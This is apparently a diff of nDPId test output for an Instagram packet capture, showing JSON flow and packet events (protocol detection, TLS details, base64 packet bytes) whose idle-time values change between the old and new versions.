-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720952553,"flow_last_seen":1436720952574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24106,"flow_avg_l4_payload_len":753,"midstream":1,"thread_ts_msec":1436720952574,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720952611,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1436720952611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720952611,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGC\/YuIUaWwKgAZwBQn5dVkK9h7WtuhaASOJDXwwAAAgQFlgQCCAoJIvhRAAP\/swEDAwU="} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1436720952611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952611,"pkt":"ABsv8H60QPMIw47hCABFAAA0kThAAEAGc8XAqABnLiFGlp+XAFDta26FVZCvYoAQAOU17QAAAQEICgAD\/7oJIvhR"} +00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":694,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720952553,"flow_last_seen":1436720952574,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24106,"flow_avg_l4_payload_len":753,"midstream":1,"thread_ts_msec":1436720952574,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720952553,"flow_last_seen":1436720952574,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24106,"flow_avg_l4_payload_len":753,"midstream":1,"thread_ts_msec":1436720952574,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720952611,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1436720952611,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720952611,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGC\/YuIUaWwKgAZwBQn5dVkK9h7WtuhaASOJDXwwAAAgQFlgQCCAoJIvhRAAP\/swEDAwU="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1436720952611,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952611,"pkt":"ABsv8H60QPMIw47hCABFAAA0kThAAEAGc8XAqABnLiFGlp+XAFDta26FVZCvYoAQAOU17QAAAQEICgAD\/7oJIvhR"} 
00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","packets-captured":745,"packets-processed":743,"total-skipped-flows":0,"total-l4-data-len":515476,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":23,"total-detection-updates":15,"total-updates":0,"current-active-flows":32,"total-active-flows":32,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":158,"global_ts_msec":1568796253770} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796253770,"flow_last_seen":1568796253770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1568796253770,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796253770,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDLAbuZigajAAAAALAC\/\/8cPAAAAgQFtAEDAwYBAQgKDXByoQAAAAAEAgAA"} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1568796253782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796253782,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wMv1rwrBmYoGpKASbHB3qgAAAgQFeAQCCAo6Lg6wDXByoQEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1568796253784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796253784,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDLAbuZigak9a8KwoAQCAwKkgAAAQEICg1wcq86Lg6w"} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796253770,"flow_last_seen":1568796253784,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1568796253784,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
-00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":750,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1568796253770,"flow_last_seen":1568796253798,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1610,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1568796253798,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2070,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254514,"flow_last_seen":1568796254514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254514,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2070,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1568796254514,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796254514,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDNAbsBxqpOAAAAALAC\/\/8NqAAAAgQFtAEDAwYBAQgKDXB1TAAAAAAEAgAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2071,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254515,"flow_last_seen":1568796254515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254515,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2071,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1568796254515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796254515,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDOAbvBtYQbAAAAALAC\/\/9z6gAAAgQFtAEDAwYBAQgKDXB1TAAAAAAEAgAA"} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2073,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254524,"flow_last_seen":1568796254524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254524,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2073,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1568796254524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796254524,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDPAbv9TOkSAAAAALAC\/\/\/TUgAAAgQFtAEDAwYBAQgKDXB1VAAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2074,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1568796254526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254526,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM2mvmccAcaqT6ASbHDxzgAAAgQFeAQCCAoU9Z3GDXB1TAEDAwg="} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2075,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1568796254526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254526,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM6bGFkcwbWEHKASbHAfPgAAAgQFeAQCCArYQyzxDXB1TAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2076,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1568796254527,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254527,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDNAbsBxqpPpr5nHYAQCAyEugAAAQEICg1wdVYU9Z3G"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2077,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1568796254527,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254527,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDOAbvBtYQcmxhZHYAQCAyyKQAAAQEICg1wdVbYQyzx"} 
-00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2078,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254514,"flow_last_seen":1568796254528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254528,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2080,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254515,"flow_last_seen":1568796254531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254531,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2082,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1568796254536,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254536,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM\/pQUID\/UzpE6ASbHCRrQAAAgQFeAQCCAoUEKcNDXB1VAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2083,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1568796254538,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254538,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDPAbv9TOkT6UFCBIAQCAwkmAAAAQEICg1wdV8UEKcN"} -00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2084,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254524,"flow_last_seen":1568796254539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
-00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2088,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254514,"flow_last_seen":1568796254539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2092,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254515,"flow_last_seen":1568796254543,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":529,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1568796254543,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
-00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2098,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254524,"flow_last_seen":1568796254551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":1154,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796254551,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7440000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908576,"flow_last_seen":1436720908733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908577,"flow_last_seen":1436720908737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1436720900687,"flow_last_seen":1436720901200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":46392,"flow_avg_l4_payload_len":799,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796253770,"flow_last_seen":1568796253770,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1568796253770,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796253770,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDLAbuZigajAAAAALAC\/\/8cPAAAAgQFtAEDAwYBAQgKDXByoQAAAAAEAgAA"} 
